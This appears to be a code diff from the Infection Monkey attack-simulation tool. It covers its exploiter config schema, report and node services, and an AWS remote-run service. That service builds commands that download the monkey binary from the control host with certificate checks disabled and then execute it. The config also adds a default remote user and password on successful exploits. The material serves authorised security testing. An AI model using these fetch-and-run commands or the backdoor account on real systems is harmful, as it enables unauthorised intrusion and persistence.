|
},
|
||||||
|
"exploits": {
|
||||||
|
"title": "Exploits",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"general": {
|
||||||
|
"title": "General",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"exploiter_classes": {
|
||||||
|
"title": "Exploits",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"$ref": "#/definitions/exploiter_classes"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"SmbExploiter",
|
||||||
|
"WmiExploiter",
|
||||||
|
"SSHExploiter",
|
||||||
|
"ShellShockExploiter",
|
||||||
|
"SambaCryExploiter",
|
||||||
|
"ElasticGroovyExploiter",
|
||||||
|
"Struts2Exploiter",
|
||||||
|
"WebLogicExploiter",
|
||||||
|
"HadoopExploiter"
|
||||||
|
],
|
||||||
|
"description":
|
||||||
|
"Determines which exploits to use. " + WARNING_SIGN
|
||||||
|
+ " Note that using unsafe exploits may cause crashes of the exploited machine/service"
|
||||||
|
},
|
||||||
|
"skip_exploit_if_file_exist": {
|
||||||
|
"title": "Skip exploit if file exists",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": False,
|
||||||
|
"description": "Determines whether the monkey should skip the exploit if the monkey's file"
|
||||||
|
" is already on the remote machine"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"ms08_067": {
|
||||||
|
"title": "MS08_067",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"ms08_067_exploit_attempts": {
|
||||||
|
"title": "MS08_067 exploit attempts",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 5,
|
||||||
|
"description": "Number of attempts to exploit using MS08_067"
|
||||||
|
},
|
||||||
|
"user_to_add": {
|
||||||
|
"title": "Remote user",
|
||||||
|
"type": "string",
|
||||||
|
"default": "Monkey_IUSER_SUPPORT",
|
||||||
|
"description": "Username to add on successful exploit"
|
||||||
|
},
|
||||||
|
"remote_user_pass": {
|
||||||
|
"title": "Remote user password",
|
||||||
|
"type": "string",
|
||||||
|
"default": "Password1!",
|
||||||
|
"description": "Password to use for created user"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"rdp_grinder": {
|
||||||
|
"title": "RDP grinder",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"rdp_use_vbs_download": {
|
||||||
|
"title": "Use VBS download",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether to use VBS or BITS to download monkey to remote machine"
|
||||||
|
" (true=VBS, false=BITS)"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"sambacry": {
|
||||||
|
"title": "SambaCry",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"sambacry_trigger_timeout": {
|
||||||
|
"title": "SambaCry trigger timeout",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 5,
|
||||||
|
"description": "Timeout (in seconds) of SambaCry trigger"
|
||||||
|
},
|
||||||
|
"sambacry_folder_paths_to_guess": {
|
||||||
|
"title": "SambaCry folder paths to guess",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
'/',
|
||||||
|
'/mnt',
|
||||||
|
'/tmp',
|
||||||
|
'/storage',
|
||||||
|
'/export',
|
||||||
|
'/share',
|
||||||
|
'/shares',
|
||||||
|
'/home'
|
||||||
|
],
|
||||||
|
"description": "List of full paths to share folder for SambaCry to guess"
|
||||||
|
},
|
||||||
|
"sambacry_shares_not_to_check": {
|
||||||
|
"title": "SambaCry shares not to check",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "string"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
"IPC$", "print$"
|
||||||
|
],
|
||||||
|
"description": "These shares won't be checked when exploiting with SambaCry"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"smb_service": {
|
||||||
|
"title": "SMB service",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"smb_download_timeout": {
|
||||||
|
"title": "SMB download timeout",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 300,
|
||||||
|
"description":
|
||||||
|
"Timeout (in seconds) for SMB download operation (used in various exploits using SMB)"
|
||||||
|
},
|
||||||
|
"smb_service_name": {
|
||||||
|
"title": "SMB service name",
|
||||||
|
"type": "string",
|
||||||
|
"default": "InfectionMonkey",
|
||||||
|
"description": "Name of the SMB service that will be set up to download monkey"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"network": {
|
||||||
|
"title": "Network",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"tcp_scanner": {
|
||||||
|
"title": "TCP scanner",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"HTTP_PORTS": {
|
||||||
|
"title": "HTTP ports",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "integer"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
80,
|
||||||
|
8080,
|
||||||
|
443,
|
||||||
|
8008,
|
||||||
|
7001
|
||||||
|
],
|
||||||
|
"description": "List of ports the monkey will check if are being used for HTTP"
|
||||||
|
},
|
||||||
|
"tcp_target_ports": {
|
||||||
|
"title": "TCP target ports",
|
||||||
|
"type": "array",
|
||||||
|
"uniqueItems": True,
|
||||||
|
"items": {
|
||||||
|
"type": "integer"
|
||||||
|
},
|
||||||
|
"default": [
|
||||||
|
22,
|
||||||
|
2222,
|
||||||
|
445,
|
||||||
|
135,
|
||||||
|
3389,
|
||||||
|
80,
|
||||||
|
8080,
|
||||||
|
443,
|
||||||
|
8008,
|
||||||
|
3306,
|
||||||
|
9200,
|
||||||
|
7001
|
||||||
|
],
|
||||||
|
"description": "List of TCP ports the monkey will check whether they're open"
|
||||||
|
},
|
||||||
|
"tcp_scan_interval": {
|
||||||
|
"title": "TCP scan interval",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 0,
|
||||||
|
"description": "Time to sleep (in milliseconds) between scans"
|
||||||
|
},
|
||||||
|
"tcp_scan_timeout": {
|
||||||
|
"title": "TCP scan timeout",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 3000,
|
||||||
|
"description": "Maximum time (in milliseconds) to wait for TCP response"
|
||||||
|
},
|
||||||
|
"tcp_scan_get_banner": {
|
||||||
|
"title": "TCP scan - get banner",
|
||||||
|
"type": "boolean",
|
||||||
|
"default": True,
|
||||||
|
"description": "Determines whether the TCP scan should try to get the banner"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"ping_scanner": {
|
||||||
|
"title": "Ping scanner",
|
||||||
|
"type": "object",
|
||||||
|
"properties": {
|
||||||
|
"ping_scan_timeout": {
|
||||||
|
"title": "Ping scan timeout",
|
||||||
|
"type": "integer",
|
||||||
|
"default": 1000,
|
||||||
|
"description": "Maximum time (in milliseconds) to wait for ping response"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"options": {
|
||||||
|
"collapsed": True
|
||||||
|
}
|
||||||
|
}
|
|
@ -6,6 +6,7 @@ import cc.services.log
|
||||||
from cc.database import mongo
|
from cc.database import mongo
|
||||||
from cc.services.edge import EdgeService
|
from cc.services.edge import EdgeService
|
||||||
from cc.utils import local_ip_addresses
|
from cc.utils import local_ip_addresses
|
||||||
|
import socket
|
||||||
|
|
||||||
__author__ = "itay.mizeretz"
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
|
@ -41,6 +42,7 @@ class NodeService:
|
||||||
# node is uninfected
|
# node is uninfected
|
||||||
new_node = NodeService.node_to_net_node(node, for_report)
|
new_node = NodeService.node_to_net_node(node, for_report)
|
||||||
new_node["ip_addresses"] = node["ip_addresses"]
|
new_node["ip_addresses"] = node["ip_addresses"]
|
||||||
|
new_node["domain_name"] = node["domain_name"]
|
||||||
|
|
||||||
for edge in edges:
|
for edge in edges:
|
||||||
accessible_from_nodes.append(NodeService.get_monkey_label(NodeService.get_monkey_by_id(edge["from"])))
|
accessible_from_nodes.append(NodeService.get_monkey_label(NodeService.get_monkey_by_id(edge["from"])))
|
||||||
|
@ -62,7 +64,10 @@ class NodeService:
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_node_label(node):
|
def get_node_label(node):
|
||||||
return node["os"]["version"] + " : " + node["ip_addresses"][0]
|
domain_name = ""
|
||||||
|
if node["domain_name"]:
|
||||||
|
domain_name = " ("+node["domain_name"]+")"
|
||||||
|
return node["os"]["version"] + " : " + node["ip_addresses"][0] + domain_name
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _cmp_exploits_by_timestamp(exploit_1, exploit_2):
|
def _cmp_exploits_by_timestamp(exploit_1, exploit_2):
|
||||||
|
@ -137,6 +142,8 @@ class NodeService:
|
||||||
"group": NodeService.get_monkey_group(monkey),
|
"group": NodeService.get_monkey_group(monkey),
|
||||||
"os": NodeService.get_monkey_os(monkey),
|
"os": NodeService.get_monkey_os(monkey),
|
||||||
"dead": monkey["dead"],
|
"dead": monkey["dead"],
|
||||||
|
"domain_name": "",
|
||||||
|
"pba_results": monkey["pba_results"] if "pba_results" in monkey else []
|
||||||
}
|
}
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -176,10 +183,11 @@ class NodeService:
|
||||||
upsert=False)
|
upsert=False)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def insert_node(ip_address):
|
def insert_node(ip_address, domain_name=''):
|
||||||
new_node_insert_result = mongo.db.node.insert_one(
|
new_node_insert_result = mongo.db.node.insert_one(
|
||||||
{
|
{
|
||||||
"ip_addresses": [ip_address],
|
"ip_addresses": [ip_address],
|
||||||
|
"domain_name": domain_name,
|
||||||
"exploited": False,
|
"exploited": False,
|
||||||
"creds": [],
|
"creds": [],
|
||||||
"os":
|
"os":
|
||||||
|
@ -191,10 +199,10 @@ class NodeService:
|
||||||
return mongo.db.node.find_one({"_id": new_node_insert_result.inserted_id})
|
return mongo.db.node.find_one({"_id": new_node_insert_result.inserted_id})
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_or_create_node(ip_address):
|
def get_or_create_node(ip_address, domain_name=''):
|
||||||
new_node = mongo.db.node.find_one({"ip_addresses": ip_address})
|
new_node = mongo.db.node.find_one({"ip_addresses": ip_address})
|
||||||
if new_node is None:
|
if new_node is None:
|
||||||
new_node = NodeService.insert_node(ip_address)
|
new_node = NodeService.insert_node(ip_address, domain_name)
|
||||||
return new_node
|
return new_node
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -261,6 +269,7 @@ class NodeService:
|
||||||
def get_monkey_island_node():
|
def get_monkey_island_node():
|
||||||
island_node = NodeService.get_monkey_island_pseudo_net_node()
|
island_node = NodeService.get_monkey_island_pseudo_net_node()
|
||||||
island_node["ip_addresses"] = local_ip_addresses()
|
island_node["ip_addresses"] = local_ip_addresses()
|
||||||
|
island_node["domain_name"] = socket.gethostname()
|
||||||
return island_node
|
return island_node
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -294,6 +303,10 @@ class NodeService:
|
||||||
def is_monkey_finished_running():
|
def is_monkey_finished_running():
|
||||||
return NodeService.is_any_monkey_exists() and not NodeService.is_any_monkey_alive()
|
return NodeService.is_any_monkey_exists() and not NodeService.is_any_monkey_alive()
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_latest_modified_monkey():
|
||||||
|
return mongo.db.monkey.find({}).sort('modifytime', -1).limit(1)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def add_credentials_to_monkey(monkey_id, creds):
|
def add_credentials_to_monkey(monkey_id, creds):
|
||||||
mongo.db.monkey.update(
|
mongo.db.monkey.update(
|
||||||
|
|
|
@ -0,0 +1,43 @@
|
||||||
|
import cc.services.config
|
||||||
|
import logging
|
||||||
|
import os
|
||||||
|
|
||||||
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
# Where to find file names in config
|
||||||
|
PBA_WINDOWS_FILENAME_PATH = ['monkey', 'behaviour', 'PBA_windows_filename']
|
||||||
|
PBA_LINUX_FILENAME_PATH = ['monkey', 'behaviour', 'PBA_linux_filename']
|
||||||
|
UPLOADS_DIR = 'monkey_island/cc/userUploads'
|
||||||
|
|
||||||
|
|
||||||
|
def remove_PBA_files():
|
||||||
|
if cc.services.config.ConfigService.get_config():
|
||||||
|
windows_filename = cc.services.config.ConfigService.get_config_value(PBA_WINDOWS_FILENAME_PATH)
|
||||||
|
linux_filename = cc.services.config.ConfigService.get_config_value(PBA_LINUX_FILENAME_PATH)
|
||||||
|
if linux_filename:
|
||||||
|
remove_file(linux_filename)
|
||||||
|
if windows_filename:
|
||||||
|
remove_file(windows_filename)
|
||||||
|
|
||||||
|
|
||||||
|
def remove_file(file_name):
|
||||||
|
file_path = os.path.join(UPLOADS_DIR, file_name)
|
||||||
|
try:
|
||||||
|
if os.path.exists(file_path):
|
||||||
|
os.remove(file_path)
|
||||||
|
except OSError as e:
|
||||||
|
logger.error("Can't remove previously uploaded post breach files: %s" % e)
|
||||||
|
|
||||||
|
|
||||||
|
def set_config_PBA_files(config_json):
|
||||||
|
"""
|
||||||
|
Sets PBA file info in config_json to current config's PBA file info values.
|
||||||
|
:param config_json: config_json that will be modified
|
||||||
|
"""
|
||||||
|
if cc.services.config.ConfigService.get_config():
|
||||||
|
linux_filename = cc.services.config.ConfigService.get_config_value(PBA_LINUX_FILENAME_PATH)
|
||||||
|
windows_filename = cc.services.config.ConfigService.get_config_value(PBA_WINDOWS_FILENAME_PATH)
|
||||||
|
config_json['monkey']['behaviour']['PBA_linux_filename'] = linux_filename
|
||||||
|
config_json['monkey']['behaviour']['PBA_windows_filename'] = windows_filename
|
|
@ -0,0 +1,138 @@
|
||||||
|
from cc.services.config import ConfigService
|
||||||
|
from common.cloud.aws_instance import AwsInstance
|
||||||
|
from common.cloud.aws_service import AwsService
|
||||||
|
from common.cmd.aws.aws_cmd_runner import AwsCmdRunner
|
||||||
|
from common.cmd.cmd import Cmd
|
||||||
|
from common.cmd.cmd_runner import CmdRunner
|
||||||
|
|
||||||
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
|
|
||||||
|
class RemoteRunAwsService:
|
||||||
|
aws_instance = None
|
||||||
|
is_auth = False
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
pass
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def init():
|
||||||
|
"""
|
||||||
|
Initializes service. Subsequent calls to this function have no effect.
|
||||||
|
Must be called at least once (in entire monkey lifetime) before usage of functions
|
||||||
|
:return: None
|
||||||
|
"""
|
||||||
|
if RemoteRunAwsService.aws_instance is None:
|
||||||
|
RemoteRunAwsService.aws_instance = AwsInstance()
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def run_aws_monkeys(instances, island_ip):
|
||||||
|
"""
|
||||||
|
Runs monkeys on the given instances
|
||||||
|
:param instances: List of instances to run on
|
||||||
|
:param island_ip: IP of island the monkey will communicate with
|
||||||
|
:return: Dictionary with instance ids as keys, and True/False as values if succeeded or not
|
||||||
|
"""
|
||||||
|
instances_bitness = RemoteRunAwsService.get_bitness(instances)
|
||||||
|
return CmdRunner.run_multiple_commands(
|
||||||
|
instances,
|
||||||
|
lambda instance: RemoteRunAwsService.run_aws_monkey_cmd_async(
|
||||||
|
instance['instance_id'], RemoteRunAwsService._is_linux(instance['os']), island_ip,
|
||||||
|
instances_bitness[instance['instance_id']]),
|
||||||
|
lambda _, result: result.is_success)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def is_running_on_aws():
|
||||||
|
return RemoteRunAwsService.aws_instance.is_aws_instance()
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def update_aws_auth_params():
|
||||||
|
"""
|
||||||
|
Updates the AWS authentication parameters according to config
|
||||||
|
:return: True if new params allow successful authentication. False otherwise
|
||||||
|
"""
|
||||||
|
access_key_id = ConfigService.get_config_value(['cnc', 'aws_config', 'aws_access_key_id'], False, True)
|
||||||
|
secret_access_key = ConfigService.get_config_value(['cnc', 'aws_config', 'aws_secret_access_key'], False, True)
|
||||||
|
|
||||||
|
if (access_key_id != AwsService.access_key_id) or (secret_access_key != AwsService.secret_access_key):
|
||||||
|
AwsService.set_auth_params(access_key_id, secret_access_key)
|
||||||
|
RemoteRunAwsService.is_auth = AwsService.test_client()
|
||||||
|
|
||||||
|
AwsService.set_region(RemoteRunAwsService.aws_instance.region)
|
||||||
|
|
||||||
|
return RemoteRunAwsService.is_auth
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_bitness(instances):
|
||||||
|
"""
|
||||||
|
For all given instances, checks whether they're 32 or 64 bit.
|
||||||
|
:param instances: List of instances to check
|
||||||
|
:return: Dictionary with instance ids as keys, and True/False as values. True if 64bit, False otherwise
|
||||||
|
"""
|
||||||
|
return CmdRunner.run_multiple_commands(
|
||||||
|
instances,
|
||||||
|
lambda instance: RemoteRunAwsService.run_aws_bitness_cmd_async(
|
||||||
|
instance['instance_id'], RemoteRunAwsService._is_linux(instance['os'])),
|
||||||
|
lambda instance, result: RemoteRunAwsService._get_bitness_by_result(
|
||||||
|
RemoteRunAwsService._is_linux(instance['os']), result))
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _get_bitness_by_result(is_linux, result):
|
||||||
|
if not result.is_success:
|
||||||
|
return None
|
||||||
|
elif is_linux:
|
||||||
|
return result.stdout.find('i686') == -1 # i686 means 32bit
|
||||||
|
else:
|
||||||
|
return result.stdout.lower().find('programfiles(x86)') != -1 # if not found it means 32bit
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def run_aws_bitness_cmd_async(instance_id, is_linux):
|
||||||
|
"""
|
||||||
|
Runs an AWS command to check bitness
|
||||||
|
:param instance_id: Instance ID of target
|
||||||
|
:param is_linux: Whether target is linux
|
||||||
|
:return: Cmd
|
||||||
|
"""
|
||||||
|
cmd_text = 'uname -m' if is_linux else 'Get-ChildItem Env:'
|
||||||
|
return RemoteRunAwsService.run_aws_cmd_async(instance_id, is_linux, cmd_text)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def run_aws_monkey_cmd_async(instance_id, is_linux, island_ip, is_64bit):
|
||||||
|
"""
|
||||||
|
Runs a monkey remotely using AWS
|
||||||
|
:param instance_id: Instance ID of target
|
||||||
|
:param is_linux: Whether target is linux
|
||||||
|
:param island_ip: IP of the island which the instance will try to connect to
|
||||||
|
:param is_64bit: Whether the instance is 64bit
|
||||||
|
:return: Cmd
|
||||||
|
"""
|
||||||
|
cmd_text = RemoteRunAwsService._get_run_monkey_cmd_line(is_linux, is_64bit, island_ip)
|
||||||
|
return RemoteRunAwsService.run_aws_cmd_async(instance_id, is_linux, cmd_text)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def run_aws_cmd_async(instance_id, is_linux, cmd_line):
|
||||||
|
cmd_runner = AwsCmdRunner(is_linux, instance_id)
|
||||||
|
return Cmd(cmd_runner, cmd_runner.run_command_async(cmd_line))
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _is_linux(os):
|
||||||
|
return 'linux' == os
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _get_run_monkey_cmd_linux_line(bit_text, island_ip):
|
||||||
|
return r'wget --no-check-certificate https://' + island_ip + r':5000/api/monkey/download/monkey-linux-' + \
|
||||||
|
bit_text + r'; chmod +x monkey-linux-' + bit_text + r'; ./monkey-linux-' + bit_text + r' m0nk3y -s ' + \
|
||||||
|
island_ip + r':5000'
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _get_run_monkey_cmd_windows_line(bit_text, island_ip):
|
||||||
|
return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \
|
||||||
|
r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \
|
||||||
|
r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \
|
||||||
|
r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip):
|
||||||
|
bit_text = '64' if is_64bit else '32'
|
||||||
|
return RemoteRunAwsService._get_run_monkey_cmd_linux_line(bit_text, island_ip) if is_linux \
|
||||||
|
else RemoteRunAwsService._get_run_monkey_cmd_windows_line(bit_text, island_ip)
|
|
@ -3,11 +3,14 @@ import functools
|
||||||
|
|
||||||
import ipaddress
|
import ipaddress
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
|
from bson import json_util
|
||||||
from enum import Enum
|
from enum import Enum
|
||||||
|
|
||||||
from six import text_type
|
from six import text_type
|
||||||
|
|
||||||
from cc.database import mongo
|
from cc.database import mongo
|
||||||
|
from cc.report_exporter_manager import ReportExporterManager
|
||||||
from cc.services.config import ConfigService
|
from cc.services.config import ConfigService
|
||||||
from cc.services.edge import EdgeService
|
from cc.services.edge import EdgeService
|
||||||
from cc.services.node import NodeService
|
from cc.services.node import NodeService
|
||||||
|
@ -37,7 +40,8 @@ class ReportService:
|
||||||
'ShellShockExploiter': 'ShellShock Exploiter',
|
'ShellShockExploiter': 'ShellShock Exploiter',
|
||||||
'Struts2Exploiter': 'Struts2 Exploiter',
|
'Struts2Exploiter': 'Struts2 Exploiter',
|
||||||
'WebLogicExploiter': 'Oracle WebLogic Exploiter',
|
'WebLogicExploiter': 'Oracle WebLogic Exploiter',
|
||||||
'HadoopExploiter': 'Hadoop/Yarn Exploiter'
|
'HadoopExploiter': 'Hadoop/Yarn Exploiter',
|
||||||
|
'MSSQLExploiter': 'MSSQL Exploiter'
|
||||||
}
|
}
|
||||||
|
|
||||||
class ISSUES_DICT(Enum):
|
class ISSUES_DICT(Enum):
|
||||||
|
@ -52,7 +56,8 @@ class ReportService:
|
||||||
STRUTS2 = 8
|
STRUTS2 = 8
|
||||||
WEBLOGIC = 9
|
WEBLOGIC = 9
|
||||||
HADOOP = 10
|
HADOOP = 10
|
||||||
PTH_CRIT_SERVICES_ACCESS = 11
|
PTH_CRIT_SERVICES_ACCESS = 11,
|
||||||
|
MSSQL = 12
|
||||||
|
|
||||||
class WARNINGS_DICT(Enum):
|
class WARNINGS_DICT(Enum):
|
||||||
CROSS_SEGMENT = 0
|
CROSS_SEGMENT = 0
|
||||||
|
@ -123,10 +128,12 @@ class ReportService:
|
||||||
'label': node['label'],
|
'label': node['label'],
|
||||||
'ip_addresses': node['ip_addresses'],
|
'ip_addresses': node['ip_addresses'],
|
||||||
'accessible_from_nodes':
|
'accessible_from_nodes':
|
||||||
(x['hostname'] for x in
|
list((x['hostname'] for x in
|
||||||
(NodeService.get_displayed_node_by_id(edge['from'], True)
|
(NodeService.get_displayed_node_by_id(edge['from'], True)
|
||||||
for edge in EdgeService.get_displayed_edges_by_to(node['id'], True))),
|
for edge in EdgeService.get_displayed_edges_by_to(node['id'], True)))),
|
||||||
'services': node['services']
|
'services': node['services'],
|
||||||
|
'domain_name': node['domain_name'],
|
||||||
|
'pba_results': node['pba_results'] if 'pba_results' in node else 'None'
|
||||||
})
|
})
|
||||||
|
|
||||||
logger.info('Scanned nodes generated for reporting')
|
logger.info('Scanned nodes generated for reporting')
|
||||||
|
@ -146,6 +153,7 @@ class ReportService:
|
||||||
{
|
{
|
||||||
'label': monkey['label'],
|
'label': monkey['label'],
|
||||||
'ip_addresses': monkey['ip_addresses'],
|
'ip_addresses': monkey['ip_addresses'],
|
||||||
|
'domain_name': monkey['domain_name'],
|
||||||
'exploits': list(set(
|
'exploits': list(set(
|
||||||
[ReportService.EXPLOIT_DISPLAY_DICT[exploit['exploiter']] for exploit in monkey['exploits'] if
|
[ReportService.EXPLOIT_DISPLAY_DICT[exploit['exploiter']] for exploit in monkey['exploits'] if
|
||||||
exploit['result']]))
|
exploit['result']]))
|
||||||
|
@ -326,6 +334,12 @@ class ReportService:
|
||||||
processed_exploit['type'] = 'hadoop'
|
processed_exploit['type'] = 'hadoop'
|
||||||
return processed_exploit
|
return processed_exploit
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def process_mssql_exploit(exploit):
|
||||||
|
processed_exploit = ReportService.process_general_exploit(exploit)
|
||||||
|
processed_exploit['type'] = 'mssql'
|
||||||
|
return processed_exploit
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def process_exploit(exploit):
|
def process_exploit(exploit):
|
||||||
exploiter_type = exploit['data']['exploiter']
|
exploiter_type = exploit['data']['exploiter']
|
||||||
|
@ -340,7 +354,8 @@ class ReportService:
|
||||||
'ShellShockExploiter': ReportService.process_shellshock_exploit,
|
'ShellShockExploiter': ReportService.process_shellshock_exploit,
|
||||||
'Struts2Exploiter': ReportService.process_struts2_exploit,
|
'Struts2Exploiter': ReportService.process_struts2_exploit,
|
||||||
'WebLogicExploiter': ReportService.process_weblogic_exploit,
|
'WebLogicExploiter': ReportService.process_weblogic_exploit,
|
||||||
'HadoopExploiter': ReportService.process_hadoop_exploit
|
'HadoopExploiter': ReportService.process_hadoop_exploit,
|
||||||
|
'MSSQLExploiter': ReportService.process_mssql_exploit
|
||||||
}
|
}
|
||||||
|
|
||||||
return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
|
return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
|
||||||
|
@ -540,12 +555,24 @@ class ReportService:
|
||||||
for issue in issues:
|
for issue in issues:
|
||||||
if not issue.get('is_local', True):
|
if not issue.get('is_local', True):
|
||||||
machine = issue.get('machine').upper()
|
machine = issue.get('machine').upper()
|
||||||
|
aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine'))
|
||||||
if machine not in domain_issues_dict:
|
if machine not in domain_issues_dict:
|
||||||
domain_issues_dict[machine] = []
|
domain_issues_dict[machine] = []
|
||||||
|
if aws_instance_id:
|
||||||
|
issue['aws_instance_id'] = aws_instance_id
|
||||||
domain_issues_dict[machine].append(issue)
|
domain_issues_dict[machine].append(issue)
|
||||||
logger.info('Domain issues generated for reporting')
|
logger.info('Domain issues generated for reporting')
|
||||||
return domain_issues_dict
|
return domain_issues_dict
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_machine_aws_instance_id(hostname):
|
||||||
|
aws_instance_id_list = list(mongo.db.monkey.find({'hostname': hostname}, {'aws_instance_id': 1}))
|
||||||
|
if aws_instance_id_list:
|
||||||
|
if 'aws_instance_id' in aws_instance_id_list[0]:
|
||||||
|
return str(aws_instance_id_list[0]['aws_instance_id'])
|
||||||
|
else:
|
||||||
|
return None
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def get_issues():
|
def get_issues():
|
||||||
ISSUE_GENERATORS = [
|
ISSUE_GENERATORS = [
|
||||||
|
@ -556,14 +583,18 @@ class ReportService:
|
||||||
PTHReportService.get_duplicated_passwords_issues,
|
PTHReportService.get_duplicated_passwords_issues,
|
||||||
PTHReportService.get_strong_users_on_crit_issues
|
PTHReportService.get_strong_users_on_crit_issues
|
||||||
]
|
]
|
||||||
|
|
||||||
issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])
|
issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])
|
||||||
|
|
||||||
issues_dict = {}
|
issues_dict = {}
|
||||||
for issue in issues:
|
for issue in issues:
|
||||||
if issue.get('is_local', True):
|
if issue.get('is_local', True):
|
||||||
machine = issue.get('machine').upper()
|
machine = issue.get('machine').upper()
|
||||||
|
aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine'))
|
||||||
if machine not in issues_dict:
|
if machine not in issues_dict:
|
||||||
issues_dict[machine] = []
|
issues_dict[machine] = []
|
||||||
|
if aws_instance_id:
|
||||||
|
issue['aws_instance_id'] = aws_instance_id
|
||||||
issues_dict[machine].append(issue)
|
issues_dict[machine].append(issue)
|
||||||
logger.info('Issues generated for reporting')
|
logger.info('Issues generated for reporting')
|
||||||
return issues_dict
|
return issues_dict
|
||||||
|
@ -625,6 +656,8 @@ class ReportService:
|
||||||
issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
|
issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
|
||||||
elif issue['type'] == 'weblogic':
|
elif issue['type'] == 'weblogic':
|
||||||
issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True
|
issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True
|
||||||
|
elif issue['type'] == 'mssql':
|
||||||
|
issues_byte_array[ReportService.ISSUES_DICT.MSSQL.value] = True
|
||||||
elif issue['type'] == 'hadoop':
|
elif issue['type'] == 'hadoop':
|
||||||
issues_byte_array[ReportService.ISSUES_DICT.HADOOP.value] = True
|
issues_byte_array[ReportService.ISSUES_DICT.HADOOP.value] = True
|
||||||
elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
|
elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
|
||||||
|
@ -659,26 +692,17 @@ class ReportService:
|
||||||
|
|
||||||
@staticmethod
|
